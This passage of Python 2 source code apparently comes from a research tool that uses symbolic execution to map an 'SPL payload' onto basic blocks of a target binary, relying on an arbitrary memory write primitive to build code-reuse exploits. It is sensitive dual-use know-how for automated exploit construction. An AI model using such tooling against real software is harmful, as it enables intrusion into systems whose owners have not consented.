                    dbg_prnt(DBG_LVL_3, "Address 0x%x is not immutable." % address)
                    return False 

        else:
            for addr, _ in abstr['memwr']:          # check other writes
                if addr.shallow_repr() == address.shallow_repr():
                    dbg_prnt(DBG_LVL_3, "Address '%s' is not immutable." % addr.shallow_repr())
                    return False

        return True


    # --------------------------------------------------------------------------------------------- 
    # __mk_unique(): Make an adress string unique.
    #
    # :Arg addrstr: Address string
    # :Arg sym: Symbolic variable
    # :Ret: A unique address
    #
    def __mk_unique(self, addrstr, sym):

        addrstr_orig = addrstr
        sym_orig     = sym


        if not sym:
            # we don't care about non-register addresses as their shallow_reprs are identical
            return addrstr_orig, sym_orig


        orig = addrstr
        for reg in HARDWARE_REGISTERS:
            # This is tooooo slow!
            #   orig = re.sub(r'%s_[0-9]+_64' % reg, '%s_64' % reg, orig)

            # use the compiled version instead
            orig = self.__regex[reg].sub('%s_64' % reg, orig)


        # if dereference is already there, use it
        if orig in self.__unique_derefs:
            return self.__unique_derefs[orig] # (addr, sym)


        # if unique, add it to the dictionary and return it as it is
        self.__unique_derefs[orig] = (addrstr_orig, sym_orig)

        return addrstr_orig, sym_orig


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''
   
    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize variables that are required for the CFG
    #      . marking process.
    #
    # 
    # :Arg project: Instance of angr project
    # :Arg cfg: Program's CFG
    # :Arg ir: Compiled IR of the SPL payload
    # :Arg avoid: Any functions that should be avoided during marking process
    #
    def __init__( self, project, cfg, ir, avoid=[] ):
        self.__proj  = project                      # save arguments to internal variables
        self.__cfg   = cfg
        self.__ir    = ir
        self.__avoid = avoid


        self.vartab = { }                           # variable table
        self.varmap = { }                           # candidate addresses for variables        

        self.__m  = { }                             # index basic block using their entry point


        # Mapping Optimization
        self.__unique_derefs = { }                  # unique derefences
        self.__regex = { }
        for reg in HARDWARE_REGISTERS:              # boost regex computations
            self.__regex[reg] = re.compile(r'%s_[0-9]+_64' % reg)


        self.__rg = nx.Graph()

        self.__rg.add_nodes_from(['__r%d' % i for i in range(8)], bipartite=0)      
        self.__rg.add_nodes_from(HARDWARE_REGISTERS, bipartite=1)

        # create a mapping between basic blocks (nodes) and their entry points (addresses)
        for node, _ in self.__cfg.graph.node.iteritems():
            self.__m[ node.addr ] = node


    # --------------------------------------------------------------------------------------------- 
    # abstract_cfg(): Iterate over CFG and "abstract" its basic blocks.
    #
    # :Ret: None. Any operations are directly applied to the CFG.
    #
    def abstract_cfg( self ):
        dbg_prnt(DBG_LVL_1, "Basic block abstraction process started.")

        nnodes    = self.__blk_cnt(self.__avoid)    # total number of nodes
        counter   = 1
        completed = 0


        # for each basic block in cfg
        for addr in self.__blk_iter(self.__avoid, 'block'):  
            dbg_prnt(DBG_LVL_3, "Abstracting block at 0x%x (%d/%d)..." % (addr, counter, nnodes))

            try:
                # apply abstraction to the basic block that starts at "addr"
                abstr = A.abstract_ng(self.__proj, addr)

                # print 'ADDR', hex(addr)
                # for a,b in abstr:
                #     print '\t', a, b
                # 
                # exit()


                # Abstraction is a process that needs to be done only once. 
                # Cache all abstractions, to avoid recalculating them later on.
                self.__cfg.graph.add_node(ADDR2NODE[addr], abstr={n:a for n,a in abstr})

                del abstr                           # release object to save memory

            except Exception, err:
                warn("Symbolic Execution at block 0x%x failed: '%s' Much sad :( "
                     "Skipping current block..." % (addr, str(err)))

                # because we don't know what's going on in this block, we simply discard it
                self.__cfg.graph.add_node(ADDR2NODE[addr], fail=1)

            counter += 1


            # show current progress (%)
            percent = math.floor(100. / nnodes * counter)
            if completed < percent:
                completed = percent            
                dbg_prnt(DBG_LVL_2, "%d%% completed" % completed)

        dbg_prnt(DBG_LVL_1, "Done.")


    # --------------------------------------------------------------------------------------------- 
    # save_abstractions(): Doing a symbolic execution on every basic block in the CFG is a very
    #       time consuming operation. The abstraction process is independent of the SPL program,
    #       saving the abstractions can save a lot of time when testing multiple SPL programs on
    #       the same binary. This function dumps all abstractions into a file
    #
    # :Arg filename: Name of the file
    # :Ret: If saving was successful, function returns True. Otherwise an error message is 
    #       displayed and function returns False.
    #
    def save_abstractions( self, filename ):
        dbg_prnt(DBG_LVL_1, "Saving basic block abstractions to a file...")

        abstr = { }                                 # place abstractions here
        fail  = set()                               # and failures here


        # collect all abstractions
        for node, attr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems(): 
            abstr[node.addr] = attr

        # collect all failures
        for node, _ in nx.get_node_attributes(self.__cfg.graph,'fail').iteritems(): 
            fail.add(node.addr)

        try:
            output = open(filename + '.abs', 'wb')  # create the file
            pickle.dump(abstr, output, 0)           # pickle dictionary using protocol 0.
            pickle.dump(fail,  output, 0)
            output.close()

        except IOError, err:                        # error is not fatal, so don't abort program
            warn("Cannot save abstractions: %s" % str(err))
            return False

    
        dbg_prnt(DBG_LVL_1, "Done.")

        return True                                 # success!


    # --------------------------------------------------------------------------------------------- 
    # load_abstractions(): Load abstractions from a file that was created by save_abstractions().
    #
    # :Arg filename: Name of the file
    # :Ret: If loading was successful, function returns True. Otherwise a fatal error is generated.
    #
    def load_abstractions( self, filename ):
        dbg_prnt(DBG_LVL_1, "Loading basic block abstractions from file...")

        abstr = { }                                 # place abstractions here
        fail  = set()                               # and failures here


        try:
            pklfile = open(filename + '.abs', 'rb') # open the file
            abstr = pickle.load(pklfile)            # load dictionary
            fail  = pickle.load(pklfile)            # and failures

            # pprint.pprint(abstr)
            pklfile.close()

        except IOError, err:                        # error is fatal, as we can't proceed
            fatal("Cannot load abstractions: %s" % str(err))
            

        # now iterate over nodes and place abstractions to the file
        for node, attr in self.__cfg.graph.nodes(data=True):
            if node.addr in abstr:
                # dbg_arb(DBG_LVL_3, "Abstractions for block 0x%x:" % node.addr, abstr[node.addr])
                self.__cfg.graph.add_node(ADDR2NODE[node.addr], abstr=abstr[node.addr])
            

            if node.addr in fail:
                dbg_prnt(DBG_LVL_3, "Analysis for block 0x%x failed :(" % node.addr)

                self.__cfg.graph.add_node(ADDR2NODE[node.addr], fail=1)


        dbg_prnt(DBG_LVL_1, "Done.")

        return True                                 # success!


    # ---------------------------------------------------------------------------------------------
    # mark_candidate(): Iterate over abstracted basic blocks and identify all candidate ones. A 
    #       basic block is a candidate when it can potentially execute any IR statement(s). However
    #       at this point we don't know yet whether this block can be really used to execute any
    #       statements; it only fulfils the requirements.
    #
    # :Arg forced_mapping: TODO
    # :Ret: If marking is possible (i.e., enough candidate blocks), then function returns True. 
    #       Otherwise it returns False. Also any operations are directly applied to the CFG.
    #
    def mark_candidate( self, forced_mapping=[] ):
        dbg_prnt(DBG_LVL_1, "Searching CFG for candidate basic blocks...")


        # ---------------------------------------------------------------------
        # Create vartab from 'varset' statements
        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_2, "Creating vartab...")

        for stmt in [s for s in self.__ir if s['type'] == 'varset']:
            self.vartab[ stmt['name'] ] = stmt['val']

        dbg_prnt(DBG_LVL_2, "Done.")       


        nnodes  = self.__blk_cnt(self.__avoid, 'abstract')
        counter = 1
        

        # ---------------------------------------------------------------------
        # Check for forced mappings first
        # ---------------------------------------------------------------------
        if forced_mapping:
            dbg_prnt(DBG_LVL_1, "Applying forced mapping ...")

            warn("No check is made against arguments! %s" % str(forced_mapping))


            # self.__rg is empty
            for vr, hw in forced_mapping:
                # TODO: check if vr is in the form __r[0-7]

                if not re.search(r'^__r.*', vr):    # check registers only
                    continue

                # make node immutable
                nx.set_node_attributes(self.__rg, 'immutable', {vr:1})        
                self.__rg.add_edge(vr, hw, var=set())


        # ---------------------------------------------------------------------
        # iterate over abstracted basic blocks
        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):  
            addr = node.addr

            dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes))

            cand = []                               # set of statement for that block

            for stmt in self.__ir:                  # check for which statements block is candidate
                match = []

                # -----------------------------------------------------------------------
                # Statement 'varset'
                #
                # Variable assignments do not require candidate blocks. Instead
                # we leverage the AWP, to store variables anywhere in the
                # memory.
                #
                # {'type': 'varset', 'uid': 6, 'val': ['a1'], 'name': 'test'}
                # {'type': 'varset', 'uid': 8, 'val': ['\xeb\x17\x00\x00\x00\x00\x00\x00'], 
                #                   'name': 'foo'}
                # {'type': 'varset', 'uid': 10, 'val': ['\xd2\x04\x00\x00\x00\x00\x00\x00', 
                #           ('foo',), ('test',)], 'name': 'bar'}
                # -----------------------------------------------------------------------
        

                # -----------------------------------------------------------------------
                # Statement 'regset'
                #
                # {'reg': 0, 'type': 'regset', 'valty': 'num', 'val': -10, 'uid': 2}
                # {'reg': 6, 'type': 'regset', 'valty': 'var', 'val': ('bar',), 'uid': 12}
                # -----------------------------------------------------------------------
                if stmt['type'] == 'regset' and not isinstance(stmt['val'], tuple):
                    
                    for reg, data in abstr['regwr'].iteritems():
                     #   print '{',  reg, data

                        # apply register filter
                        if not self.__reg_filter(reg): continue


                        if data['type'] == 'concrete' and stmt['val'] == data['const']:
                            dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s = 0x%x" % 
                                                (stmt['reg'], reg, data['const']) )

                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:
                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)
                            
                            # a candidate block has found
                            match.append( {'reg':reg, 'deps':[]} )


                        # if there's no concrete value, check for dereferences
                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):

                            dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s = [%s]" % 
                                                (stmt['reg'], reg, data['addr']) )

                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:
                                self.__rg.add_edge('__r%d' % stmt['reg'], reg)

                            # a candidate block has found
                            match.append( {'reg':reg, 'addr':data['addr'].shallow_repr(), 
                                            'sym':data['sym'],
                                            'deps':data['deps'], # 'mem':(data['addr'], stmt['val'])                                            
                                            } )


                            for a, b in abstr['symvars'].iteritems():
                                # SYM2ADDR[a] = b

                                SYM2ADDR[a.shallow_repr()] = b
                                STR2BV[a.shallow_repr()] = a

                            # Initially, varmap was designed to work with integers as addresses and
                            # all modules operate under this assumption. However, when we store
                            # bitvectors instead of integers, code starts throwing exceptions.
                            #
                            # To fix that, we do a very nasty trick: We store bitvectors as strings
                            # (so there are no exceptions anymore) and we map those strings to the
                            # real bitvectors in a global dictionary, so later on we can recover 
                            # the initial bitvectors.
                            STR2BV[ data['addr'].shallow_repr() ] = data['addr']


                            # ok forget about dependencies for now...

                
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'regset' and isinstance(stmt['val'], tuple):

                    #
                    for reg, data in abstr['regwr'].iteritems():
                    #    print '&&',  reg, data

                        # apply register filter
                        if not self.__reg_filter(reg): continue


                        if data['type'] == 'concrete' and data['writable'] == True:


                            dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s = 0x%x (%s)" % 
                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))

                            '''
                            dbg_prnt(DBG_LVL_0, "Statement match! (__r%d) %%%s = 0x%x (%s)" % 
                                                (stmt['reg'], reg, data['const'], stmt['val'][0]))
                            print '\t', 'ADDR', hex(addr)                            
                            print '\t', data
                            print '\t', abstr['conwr']
                            print '\t', abstr['memwr']
                            print '\n\n'

                            # apply abstraction to the basic block that starts at "addr"
                            abstr = A.abstract_ng(self.__proj, 0x403fa2)

                            print '^^^^^^^^^^^^^^^^^^^^^^'
                            abstr = A.abstract_ng(self.__proj, 0x40400A)
                            
                            exit()

                            '''

                            # Abstraction is a process that needs to be done only once. 
                            if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):
                                var = set()
                            else:               
                                # get edge dict (if no edge dict = None)
                                var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)
                                var = var['var']


                            # print '============================>', var
                            var.add( (stmt['val'][0], data['const']) )


                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\
                                self.__rg.has_edge('__r%d' % stmt['reg'], reg):
                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)

                            # a perfect match has found (with this address)
                            match.append( {'reg':reg, 'addr':data['const'], 'deps':[]} )


                            # use a set because we don't want duplicate addresses
                            self.varmap.setdefault( data['const'], 
                                        set([])).add( (data['const'], reg) )

   
                        # if there's no concrete value, check for dereferences
                        elif data['type'] == 'deref' and self.__imm_addr(data['addr'], abstr):
                            pass
                            
                            dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s = [%s] (%s)" % 
                                                (stmt['reg'], reg, data['addr'], stmt['val'][0]))

                            # ----------------------------------------------------------- 
                            # Apply an optimization to reduce the large number of derefs.
                            # Ignore weird addresses that very unlikely to give a solution
                            # Yes we may miss some solutions, but the probability is very
                            # small.
                            # -----------------------------------------------------------
                            blacklist = ['SignExt', 'symbolic_read_unconstrained', 'Reverse', 'stack_']
                            skip = False

                            for word in blacklist:
                                if word in data['addr'].shallow_repr():
                                    skip = True
                                    dbg_prnt(DBG_LVL_3, "blacklisted address '%s'" % 
                                                            data['addr'].shallow_repr())
                                    break


                            # Initially, varmap was designed to work with integers as addresses and
                            # all modules operate under this assumption. However, when we store
                            # bitvectors instead of integers, code starts throwing exceptions.
                            #
                            # To fix that, we do a very nasty trick: We store bitvectors as strings
                            # (so there are no exceptions anymore) and we map those strings to the
                            # real bitvectors in a global dictionary, so later on we can recover 
                            # the initial bitvectors.
                            if not skip:
                                STR2BV[ data['addr'].shallow_repr() ] = data['addr']

                                # here we a have a double pointer...
                                addrstr = '*' + data['addr'].shallow_repr()


                                if not self.__rg.has_edge('__r%d' % stmt['reg'], reg):
                                    var = set()
                                else:               
                                    # get edge dict (if no edge dict = None)
                                    var = self.__rg.get_edge_data('__r%d' % stmt['reg'], reg)

                                    # var['var'] can be empty on regmod
                                    var = var['var'] if 'var' in var else set()


                                # -------------------------------------------------------
                                # Optimization #2:
                                #
                                # The same variables can have mappings to many different addresses,
                                # that are essentially the same. For example:
                                #   argv <-> '*<BV64 rsi_22784_64>' 
                                #            '*<BV64 rsi_41354_64>' 
                                #            '*<BV64 rsi_29142_64>'
                                #
                                # IN a
                                # -------------------------------------------------------
                                sym = data['sym']

                                addrstr, sym = self.__mk_unique(addrstr, data['sym'])


                                # store addrstr as a tuple to distinguish it from variables
                                # print '============================>', var
                                var.add( (stmt['val'][0], (addrstr,)) )


                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] or\
                                    self.__rg.has_edge('__r%d' % stmt['reg'], reg):
                                        self.__rg.add_edge('__r%d' % stmt['reg'], reg, var=var)


                                # a match has found (with this address)
                                match.append( {'reg':reg, 'addr':addrstr, 'deps':data['deps'], 
                                                'sym':sym
                                                # 'mem':(data['addr'], stmt['val'])
                                                } )

                                for a, b in abstr['symvars'].iteritems():
                                    SYM2ADDR[a.shallow_repr()] = b

                                    STR2BV  [a.shallow_repr()] = a


                                # use a set because we don't want duplicate addresses
                                self.varmap.setdefault(addrstr, set([])).add( (addrstr, reg) )


                # -----------------------------------------------------------------------
                # Statement 'regmod'
                #
                # {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'regmod':

                    for reg, data in abstr['regwr'].iteritems():
                     #   print '{',  reg, data

                        # apply register filter
                        if not self.__reg_filter(reg): continue

                        if data['type'] == 'mod' and data['op'] == stmt['op'] and \
                           data['const'] == stmt['val']:

                                # match!
                                dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s %s= 0x%x" % 
                                                (stmt['reg'], reg, data['op'], data['const']))
                                               

                                if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']]:
                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)

                                match.append( reg ) # a perfect match has found


                # -----------------------------------------------------------------------
                # Statement 'memrd'
                #
                #  {'mem': 0, 'type': 'memrd', 'uid': 6, 'reg': 1}
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memrd':
                
                    for reg, data in abstr['regwr'].iteritems():

                        # apply register filter
                        if not self.__reg_filter(reg): continue

                        # TODO: data['memrd'] == MEMORY_LOADSTORE_SIZE
                        if data['type'] == 'deref' and data['memrd']:

                            loadreg = data['deps'][0]

                            # match!
                            dbg_prnt(DBG_LVL_3, "Statement match! (__r%d) %%%s = *(__r%d) %%%s" % 
                                            (stmt['reg'], reg, stmt['mem'], loadreg))
                                  

                            if 'immutable' not in self.__rg.node['__r%d' % stmt['reg']] and \
                               'immutable' not in self.__rg.node['__r%d' % stmt['mem']]:
                                    self.__rg.add_edge('__r%d' % stmt['reg'], reg)
                                    self.__rg.add_edge('__r%d' % stmt['mem'], loadreg)


                            # a perfect match has found
                            match.append( (reg, loadreg) )
        

                # -----------------------------------------------------------------------
                # Statement 'memwr'
                #
                # {'uid': 6, 'type': 'memwr', 'mem': 2, 'val': 1}
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memwr':
                    
                    for memwr in abstr['splmemwr']:
                        print 'MEMWR', memwr
                        # apply register filters
                        if not self.__reg_filter(memwr['mem']) or \
                           not self.__reg_filter(memwr['val']):
                                continue


                        # TODO: memwr['size'] == MEMORY_LOADSTORE_SIZE
                    
                        # match!
                        dbg_prnt(DBG_LVL_3, "Statement match! *(__r%d) %%%s = (__r%d) %%%s" % 
                                        (stmt['mem'], memwr['mem'], stmt['val'], memwr['val']))
                              

                        if 'immutable' not in self.__rg.node['__r%d' % stmt['mem']] and \
                           'immutable' not in self.__rg.node['__r%d' % stmt['val']]:
                                self.__rg.add_edge('__r%d' % stmt['mem'], memwr['mem'])
                                self.__rg.add_edge('__r%d' % stmt['val'], memwr['val'])


                        # a perfect match has found
                        match.append( (memwr['mem'], memwr['val']) )
        

                # -----------------------------------------------------------------------
                # Statement 'call'
                #
                # {'uid': 22, 'type': 'call', 'name': 'puts', 'args': [0], 'dirty': ['rax']}
                #
                # TODO: Comment is from old SPL
                #
                # for SYSCALL and LIBCALL statements, we only care about the name:If name 
                # matches with this one in IL statement then we have a match. We assume that
                # library calls, follow the standard calling convetions and all of their 
                # arguments are stored on registers. Therefore both syscalls and libcalls 
                # use fixed registers native registers, that we can take their values from
                # REGSET/REGMOD statements.
                #
                # However, how do we check if the arguments have the desired value? Consider
                # for example the following basic block:
                #       ...
                #       mov  rdi, 7
                #       call exit
                #
                # Also assume that we have the following SPL statement:
                #       __r0 = 5;
                #       exit( __r0 );
                #
                # In this case this basic block cannot be used for this system call as the
                # argument (7) is different from the desired (5). However this basic block
                # is marked as good for the 2nd statement and as bad for 1st. Thus, we can't
                # really use this block for the call, as it destroys the 1st statement.
                #
                # Thus all we have to do is to match the call name and let the route building
                # algorithm to decide whether this block can be actually used for the call.
                # This small demonstration shows how different parts of the algorithm
                # integrate each other, thus giving us an elegant design :)
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'call':

                    # WARNING: ab.funcall() returns the name of the function. If binary is not 
                    # stripped, ab.funcall() returns also names from user defined functions. Thus,
                    # we may have some confusion betwee library function names and user defined 
                    # functions.
                    if abstr['call'] and abstr['call']['name'] == stmt['name']:
                        dbg_prnt(DBG_LVL_3, "%s match! %s()" % (abstr['call']['type'], stmt['name']))

                        match = [ stmt['name'] ]    # make it a list for mark_accepted()
                        

                        # A call reveals a register mapping. For example the only way to 
                        # execute the SPL statement "puts(__r2)", is by mapping __r2 to rdi
                        # 
                        # So we go back to the register graph (__rg) and we drop all unnecessary
                        # edges from it (otherwise, we'll try mappings that are impossible to
                        # give a solution),
                        #
                        # To prevent future candidate blocks to add new mappings for that register,
                        # we mark the register node in __rg as 'immutable', so no new edges can
                        # be added.
                        #
                        
                        # Callign conventions:
                        #       System V AMD64 ABI: rdi, rsi, rdx, rcx, r8, r9
                        #       x64 Syscall       : rdi, rsi, rdx, r10, r8, r9

                        # get calling convention (syscalls have different CC)
                        if find_syscall(stmt['name']):
                            rsv = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
                        else:
                            rsv = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']

                        for hw, vr in zip(rsv, stmt['args']):
                            
                            # make node immutable
                            nx.set_node_attributes(self.__rg, 'immutable', {'__r%d' % vr:1})

                            # drop all edges but the one used by calling convention
                            for reg in self.__rg.neighbors('__r%d' % vr):
                                if reg != hw:
                                    self.__rg.remove_edge('__r%d' % vr, reg)

                        
                            # if there's no edge, add it
                            if not self.__rg.has_edge('__r%d' % vr, hw):
                                self.__rg.add_edge('__r%d' % vr, hw, var=set())

                            # a perfect match has found (with this address)


                # -----------------------------------------------------------------------
                # Statement 'cond'
                #
                # {'uid':30, 'type':'cond', 'reg':0, 'op':'>=', 'num':'0x3243', 'target':'@__26'}
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'cond':
                    # print abstr['cond']
                    try:
                        if abstr['cond'] and abstr['cond']['op'] == stmt['op'] and \
                            abstr['cond']['const'] == stmt['num']:

                                # apply register filter
                                if self.__reg_filter(abstr['cond']['reg']):

                                    dbg_prnt(DBG_LVL_3, "Conditional jump match! (__r%d) %%%s" % 
                                                        (stmt['reg'], abstr['cond']['reg']))

                                    # make it a list
                                    match = [ abstr['cond']['reg'] ]

                    except KeyError:
                        pass
                
                # -----------------------------------------------------------------------
                # Statement 'jump' or 'return'
                #
                # Just ignore them
                # -----------------------------------------------------------------------
                else: 
                    pass

                if len(match) > 0:                  # if statement was good add it to the good set
                    cand.append( (stmt['uid'], match) )
        

            if len(cand) > 0:                       # if block is good for at least 1 statement
                dbg_arb(DBG_LVL_3, "Block 0x%x is candidate when:" % addr, cand )

                # add "cand" attribute to that block (node)
                self.__cfg.graph.add_node(self.__m[addr], cand=cand)


            counter += 1

          #  break          


        # ---------------------------------------------------------------------
        # Check for forced variable mappings last
        # ---------------------------------------------------------------------
        if forced_mapping:
            dbg_prnt(DBG_LVL_1, "Applying forced (variable) mapping ...")

            warn("No check is made against arguments! %s" % str(forced_mapping))

            # self.__rg is empty
            for fvar, fval in forced_mapping:
                # TODO: check if vr is in the form __r[0-7]
                if re.search(r'^__r.*', fvar):       # check variables only
                    continue

                
                # iterate over edges
                for _, _, Vg in self.__rg.edges(data=True):                        
                    if 'var' not in Vg:
                        continue        

                    for var, val in set(Vg['var']):
                        # print var, fvar, val, fval
                        if var == fvar:
                            if isinstance(val, tuple) and val[0] != fval:
                                Vg['var'].remove( (var, val) )

                            elif isinstance(val, long) and str(val) != fval:                                
                                Vg['var'].remove( (var, val) )


        # -------------------------------------------------------------------------------
        # check if you have a sufficient number of candidate blocks
        # -------------------------------------------------------------------------------
        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%', len(self.__ir)
        # for i,j in self.__rg.edge.iteritems(): print i, j

        cnt = set()

        for n, c in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): 
            # print '0x%x' % n.addr, c

            for a, _ in c:
                cnt.add( a )


        if len(cnt) < self.__ir.nreal:
            print len(cnt), cnt 
            print self.__ir.nreal
            error("Not enough candidate blocks")
            return False


        # print self.vartab
        # print self.varmap
        # for i,j in self.varmap.iteritems():
        #       print i, [(hex(j), k) for j, k in j]

        self.map_graph = self.__rg
        
        # for edge in self.map_graph.edges(data=True):
        #     print edge

        # for node in self.map_graph.nodes(data=True):
        #     print node

        # print self.__rg.edges()

        # print variable mappings 
        for u, v, w in self.__rg.edges(data=True):
            if 'var' not in w:
                continue

            dbg_prnt(DBG_LVL_3, 'Variable mappings for register mapping %s <-> %s' % (u,v))
            for ctr, (var, val) in enumerate(w['var']):
                dbg_prnt(DBG_LVL_3, "\t#%03d '%s' <-> '%s'" % (ctr, var, val))

        return True


    # --------------------------------------------------------------------------------------------- 
    # mark_accepted(): Given a register and a variable mapping, this function identifies the
    #       subset of candidate basic blocks that can be truly used to execute SPL statements
    #       (i.e., accepted basic blocks).
    #
    # :Arg rmap: A list of (virtual reguster, hardware register) mappings
    # :Arg vmap: A list of (variable, address) mappings
    # :Ret: If there are enough accepted blocks, function returns a tuple with:
    #       1) a dictionary that has a list of all accepted basic blocks for each "real" statement. 
    #       2) rsvp. TODO: Fill in.
    #
    # Otherwise, function returns None.
    #
    def mark_accepted( self, rmap, vmap ):
        dbg_prnt(DBG_LVL_1, "Searching for accepted basic blocks...")

        # clear potential leftovers from previous attempts
        for node, _ in nx.get_node_attributes(self.__cfg.graph,'acc').items(): 
            del self.__cfg.graph.node[node]['acc']


        rmap = { vr:hw    for vr,hw    in rmap }    # cast them to dictionaries to ease searching
        vmap = { var:addr for var,addr in vmap }

        cnt = set()
    

        accepted = { }                              # dictionary of lists
        rsvp = { }                                  # reserved memory slots
        

        # iterate over candidate basic blocks
        #
        # <CFGNode main+0xff 0x4007e6L[24]> [(4, ['rax']), (3, [('rsi', 576460752303358064L)])]
        for node, attr in nx.get_node_attributes(self.__cfg.graph,'cand').iteritems(): 
            # dbg_prnt(DBG_LVL_3, "Analyzing candidate block at 0x%x..." % node.addr)
       

            acc = []

            for stmt, cand in [(self.__ir[uid], c) for (uid, cand) in attr for c in cand]:

                # "varset", "label", "jump" and "return" are not real statements and therefore
                # they do not require an accepted block.

                # print '--->', cand, stmt, attr

                # -----------------------------------------------------------------------
                # Statement 'regset'
                #
                # Examples of 'cand':
                #   {'reg': 'rax', 'deps': ['rsi'], 'addr': '<BV64 rsi_674_64>'},
                #   {'reg': 'rsp', 'deps': [], 'addr': 576460752303357928L}]
                #   {'reg': 'rax', 'deps': []}
                # -----------------------------------------------------------------------
                if stmt['type'] == 'regset':
                    isok = False


                    # check if register matches
                    if rmap[ '__r%d' % stmt['reg'] ] == cand['reg']:
                        # case #1: rax = 10
                        if 'addr' not in cand:
                            # block is accepted
                            acc.append( stmt['uid'] )
                            isok = True


                        # case #2: rax = 0x7fffffffffeffe8
                        elif isinstance(cand['addr'], long):
                            if vmap[ stmt['val'][0] ] == cand['addr']:
                                acc.append( stmt['uid'] )
                                isok = True


                        # case #3: rax = [rsi + 0x10], *(rsi + 0x10) = 10
                        # case #4: rax = [rsi + 0x10], *(rsi + 0x10) = 0x7fffffffffeffe8                        
                        elif isinstance(cand['addr'], str):
                            acc.append( stmt['uid'] )
                            isok = True

                            rsvp.setdefault(node.addr, []).append( 
                                (stmt['uid'], cand['addr'], cand['sym'], stmt['val']) 
                            )

                        # print '   $ $ $ $ $ $ $ $ RSVP:   ', rsvp[node.addr]


                    # TODO: make dependencies time-sensitive &  explain why it doesn't work
                    if isok and cand['deps']:      # are there dependencies?
                        pass
                        # make sure that dependencies are not reserved registers
                        if filter(lambda reg: reg in cand['deps'], rmap.values()):
                            pass
 
                            # this block uses a reserved register. It cannot be accepted for that
                            # statement


                # -----------------------------------------------------------------------
                # Statement 'regmod'
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'regmod':
                    if rmap['__r%d' % stmt['reg']] == cand:
                        acc.append( stmt['uid'] )


                # -----------------------------------------------------------------------
                # Statement 'memrd'
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memrd':                                      
                    if (rmap['__r%d' % stmt['reg']], rmap['__r%d' % stmt['mem']]) == cand:
                        acc.append( stmt['uid'] )

                
                # -----------------------------------------------------------------------
                # Statement 'memwr'
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memwr':
                    if (rmap['__r%d' % stmt['mem']], rmap['__r%d' % stmt['val']]) == cand:
                        acc.append( stmt['uid'] )

                           
                # -------------------------------------------------------------------------                     
                # Statement 'call'
                #
                # Here, we make all 'call' candidate blocks accepted and we let the 
                # regset/regmod statements to make the clobbering
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'call':
                    acc.append( stmt['uid'] )


                # -----------------------------------------------------------------------
                # Statement 'cond'
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'cond':
                    # this basic block is already candidate so no need for further checks                    
                    if rmap[ '__r%d' % stmt['reg'] ] == cand:
                        acc.append( stmt['uid'] )
            

            if len(acc) > 0:
                dbg_prnt(DBG_LVL_4, "Block 0x%x is accepted for statement(s): %s" %
                                      (node.addr, ', '.join(sorted(map(str, acc))) ) )
                
                self.__cfg.graph.node[node]['acc'] = acc
                
                for a in acc:           
                    accepted.setdefault(a, []).append(node.addr)

                cnt |= set(acc)


        # print 'accepted', accepted


        # -------------------------------------------------------------------------------
        # check if there are accepted blocks for all statements
        # -------------------------------------------------------------------------------
        if len(cnt) < self.__ir.nreal:
            #fatal("Not enough candidate blocks")
            dbg_prnt(DBG_LVL_1, "There are not enough accepted basic blocks. Much sad :(")
            return None, None                       # failure x(

       
        dbg_prnt(DBG_LVL_1, "Done.")

        return accepted, rsvp                       # success!


    # ---------------------------------------------------------------------------------------------
    # mark_clobbering(): Given a register and a variable mapping, this function identifies the set
    #       of clobbering basic blocks. Note that an accepted block can also be clobbering.
    #
    # :Arg rmap: A list of (virtual reguster, hardware register) mappings
    # :Arg vmap: A list of (variable, address) mappings
    # :Ret: TODO!!
    #       
    def mark_clobbering( self, rmap, vmap ):
        dbg_prnt(DBG_LVL_1, "Searching for clobbering basic blocks...")

        rmap = dict( map(reversed, rmap) )          # cast them to dictionaries to ease searching
        vmap = dict( map(reversed, vmap) )          # (reverse mappings)


        # clear potential leftovers from previous attempts
        for node, _ in nx.get_node_attributes(self.__cfg.graph,'clob').items(): 
            del self.__cfg.graph.node[node]['clob']


        clobbering = { }

        nnodes  = self.__blk_cnt(self.__avoid)
        counter = 1
        
        # iterate over all abstracted basic blocks
        # (__blk_iter() might return different results for 'node and 'block' methods!)
        for node, abstr in self.__blk_iter(self.__avoid, 'abstract'):
            # dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes))

